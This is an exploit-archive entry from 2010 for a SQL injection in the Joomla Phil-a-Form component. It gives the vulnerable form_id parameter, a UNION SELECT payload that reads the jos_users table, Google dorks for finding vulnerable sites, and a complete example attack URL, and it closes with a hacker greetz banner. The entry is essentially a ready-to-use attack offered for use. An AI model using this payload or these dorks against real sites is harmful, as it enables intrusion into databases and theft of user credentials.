Joomla Component Phil-a-Form SQL Injection Vulnerability

2010-05-22T00:00:00
ID 1337DAY-ID-12354
Type zdt
Reporter Emre5807
Modified 2010-05-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================================
Joomla Component Phil-a-Form SQL Injection Vulnerability
========================================================


[+] Vulnerable File :


http://127.0.0.1/index.php?option=com_philaform&Itemid=15&form_id=[SQL]


[+] ExploiT :

-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+

jos_users--


[+] G00gle Dork :

inurl:com_philaform

inurl:index.php?option=com_philaform&Itemid=15&form_id=


[+] Example :

http://127.0.0.1/index.php?option=com_philaform&Itemid=15&form_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--


##############################################################################################################
# Greetz : CodeS - жlЭM - VatanAy - TurkishWarrior - DJ_K_A_H_I_R - LegenDSemih - Enes_60 - Gamoscu - Manas58
##############################################################################################################



#  0day.today [2018-01-03]  #